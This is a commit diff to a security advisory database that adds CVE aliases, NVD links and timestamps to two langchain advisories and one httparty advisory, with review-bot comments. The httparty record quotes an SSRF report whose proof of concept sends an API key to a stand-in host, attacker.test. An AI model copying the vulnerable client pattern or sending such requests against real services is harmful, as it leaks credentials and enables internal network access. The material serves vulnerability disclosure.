
Commit 550dfc7

1 parent 6c4d1f9 commit 550dfc7


3 files changed

+21
-7
lines changed


advisories/github-reviewed/2025/12/GHSA-c67j-w6g6-q2cm/GHSA-c67j-w6g6-q2cm.json

Lines changed: 6 additions & 2 deletions
Original file line number | Diff line number | Diff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-c67j-w6g6-q2cm",
4-
"modified": "2025-12-23T18:46:13Z",
4+
"modified": "2025-12-24T01:08:07Z",
55
"published": "2025-12-23T18:46:13Z",
66
"aliases": [
77
"CVE-2025-68664"
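Review bot: the `modified` bump to 2025-12-24T01:08:07Z should be checked against the other timestamps this commit writes into the same file; it is later than the `nvd_published_at` value set in the last hunk (2025-12-23T23:15:44Z) and `published` is left untouched at 2025-12-23T18:46:13Z, which is the correct split for a metadata-only refresh. The alias `CVE-2025-68664` already present here is what the NVD URL added below must match.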
@@ -59,6 +59,10 @@
5959
"type": "WEB",
6060
"url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm"
6161
},
62+
{
63+
"type": "ADVISORY",
64+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68664"
65+
},
6266
{
6367
"type": "WEB",
6468
"url": "https://github.com/langchain-ai/langchain/pull/34455"
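Review bot: the CVE suffix in the new NVD URL (CVE-2025-68664) must match the entry in `aliases` from the first hunk, and it does; the mismatch risk is real because the sibling langchainjs record in this commit carries the adjacent ID CVE-2025-68665. The new reference is typed `ADVISORY` while the project's own GHSA link just above stays `WEB`; that split is applied identically in all three files here, so it is consistent, just worth noting that the canonical GHSA page is not the one tagged `ADVISORY`.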
@@ -95,6 +99,6 @@
9599
"severity": "CRITICAL",
96100
"github_reviewed": true,
97101
"github_reviewed_at": "2025-12-23T18:46:13Z",
98-
"nvd_published_at": null
102+
"nvd_published_at": "2025-12-23T23:15:44Z"
99103
}
100104
}
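Review bot: `nvd_published_at` changes from `null` to 2025-12-23T23:15:44Z, which is after `github_reviewed_at` (2025-12-23T18:46:13Z) and after `published`, consistent with a GitHub-first advisory that NVD indexed later; an earlier value would indicate a copy error. The key remains the last in the object, so the absence of a trailing comma is correct and the JSON stays valid.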

advisories/github-reviewed/2025/12/GHSA-hm5p-x4rq-38w4/GHSA-hm5p-x4rq-38w4.json

Lines changed: 9 additions & 3 deletions
Original file line number | Diff line number | Diff line change
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-hm5p-x4rq-38w4",
4-
"modified": "2025-12-23T19:31:10Z",
4+
"modified": "2025-12-24T01:07:33Z",
55
"published": "2025-12-23T19:31:10Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2025-68696"
8+
],
79
"summary": "httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage",
810
"details": "## Summary\n\nThere may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.\n\n## Details\n\nWhen httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.\n\nConsider the following example of a web application:\n\n```rb\nrequire 'sinatra'\nrequire 'httparty'\n\nclass RepositoryClient\n include HTTParty\n base_uri 'http://exmaple.test/api/v1/repositories/'\n headers 'X-API-KEY' => '1234567890'\nend\n\npost '/issue' do\n request_body = JSON.parse(request.body.read)\n RepositoryClient.get(request_body['repository_id']).body\n # do something\n json message: 'OK'\nend\n```\n\nNow, suppose an attacker sends a request like this:\n\n```\nPOST /issue HTTP/1.1\nHost: localhost:10000\nContent-Type: application/json\n\n{\n \"repository_id\": \"http://attacker.test\",\n \"title\": \"test\"\n}\n```\n\nIn this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.\n\nIs this behavior considered intentional in httparty?\n\nA similar problem was reported and fixed in the HTTP client library axios in the past: \n<https://github.com/axios/axios/issues/6463>\n\nAlso, Python's `urljoin` function has documented a warning about similar behavior: \n<https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin>\n\nIn my opinion, httparty should verify, right before sending the request, that either of the following conditions is met:\n\n1. The destination URL has a prefix matching `base_uri`. \n2. `base_uri` is not set.\n\n## PoC\n\nFollow these steps to reproduce the issue:\n\n1. 
Set up two simple HTTP servers.\n\n ```bash\n mkdir /tmp/server1 /tmp/server2\n echo \"this is server1\" > /tmp/server1/index.html \n echo \"this is server2\" > /tmp/server2/index.html\n python -m http.server -d /tmp/server1 10001 &\n python -m http.server -d /tmp/server2 10002 &\n ```\n\n2. Create a script (for example, `main.rb`):\n\n ```rb\n require 'httparty'\n\n class Client\n include HTTParty\n base_uri 'http://localhost:10001'\n end\n\n data = Client.get('http://localhost:10002').body\n puts data\n ```\n\n3. Run the script:\n\n ```bash\n $ ruby main.rb\n this is server2\n ```\n\nAlthough `base_uri` is set to `http://localhost:10001/`, httparty sends the request to `http://localhost:10002/`.\n\n\n## Impact\n\n- Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts. \n- SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running. \n- Affected users: Any software that uses `base_uri` and does not properly validate the path parameter may be affected by this issue.",
911
"severity": [
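Review bot: the `details` body in this hunk uses `http://exmaple.test` in the `base_uri` of the code sample but `http://example.test` in the sentence that follows; the typo predates this change, but since the record is rewritten anyway it could be corrected in the same pass. The same body keeps the reporter's question ("Is this behavior considered intentional in httparty?") and first-person recommendation ("In my opinion, httparty should verify...") verbatim, which reads as an unedited report rather than a published advisory. On the substantive change, `aliases` goes from `[]` to `["CVE-2025-68696"]`, and the hunk header `-1,9 +1,11` accounts for the two removed and four added lines correctly.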
@@ -38,6 +40,10 @@
3840
"type": "WEB",
3941
"url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4"
4042
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68696"
46+
},
4147
{
4248
"type": "WEB",
4349
"url": "https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240"
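Review bot: the new NVD reference carries CVE-2025-68696, matching the alias added in the first hunk of this file; it is inserted between the GHSA advisory link and the fix commit `0529bcd6309c9fd9bfdd50ae211843b10054c240`, in the same position used for the two langchain records in this commit, so reference ordering stays uniform across the three files.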
@@ -54,6 +60,6 @@
5460
"severity": "HIGH",
5561
"github_reviewed": true,
5662
"github_reviewed_at": "2025-12-23T19:31:10Z",
57-
"nvd_published_at": null
63+
"nvd_published_at": "2025-12-23T23:15:45Z"
5864
}
5965
}
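Review bot: before this change the record had both `aliases: []` and `nvd_published_at: null`, and this hunk completes the second half of that pair; the two fields should always move together, so if the CVE alias is ever dropped from this record this timestamp must revert to `null` as well. The value 2025-12-23T23:15:45Z is one second after the langchain record's, consistent with a single NVD publication batch, and is later than `github_reviewed_at` (2025-12-23T19:31:10Z) as expected.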

advisories/github-reviewed/2025/12/GHSA-r399-636x-v7f6/GHSA-r399-636x-v7f6.json

Lines changed: 6 additions & 2 deletions
Original file line number | Diff line number | Diff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-r399-636x-v7f6",
4-
"modified": "2025-12-23T20:08:48Z",
4+
"modified": "2025-12-24T01:08:11Z",
55
"published": "2025-12-23T20:08:48Z",
66
"aliases": [
77
"CVE-2025-68665"
@@ -97,6 +97,10 @@
9797
"type": "WEB",
9898
"url": "https://github.com/langchain-ai/langchainjs/security/advisories/GHSA-r399-636x-v7f6"
9999
},
100+
{
101+
"type": "ADVISORY",
102+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68665"
103+
},
100104
{
101105
"type": "WEB",
102106
"url": "https://github.com/langchain-ai/langchainjs/commit/e5063f9c6e9989ea067dfdff39262b9e7b6aba62"
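Review bot: check that the CVE in this NVD URL is 68665, not the 68664 used by the langchain (Python) record in the same commit; the two IDs differ by one digit and both files are edited here, so a copy between them would be easy to miss. The URL reads CVE-2025-68665 and matches the alias in the first hunk of this file, and the reference sits before the fix commit `e5063f9c6e9989ea067dfdff39262b9e7b6aba62`, mirroring the layout in the other two files.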
@@ -121,6 +125,6 @@
121125
"severity": "HIGH",
122126
"github_reviewed": true,
123127
"github_reviewed_at": "2025-12-23T20:08:48Z",
124-
"nvd_published_at": null
128+
"nvd_published_at": "2025-12-23T23:15:45Z"
125129
}
126130
}
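Review bot: `nvd_published_at` 2025-12-23T23:15:45Z is later than `github_reviewed_at` (2025-12-23T20:08:48Z) and earlier than the new `modified` value from the first hunk (2025-12-24T01:08:11Z), so the timestamp ordering is consistent; nothing else in the closing object changes, and the edited key is still last, so no trailing comma is needed.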
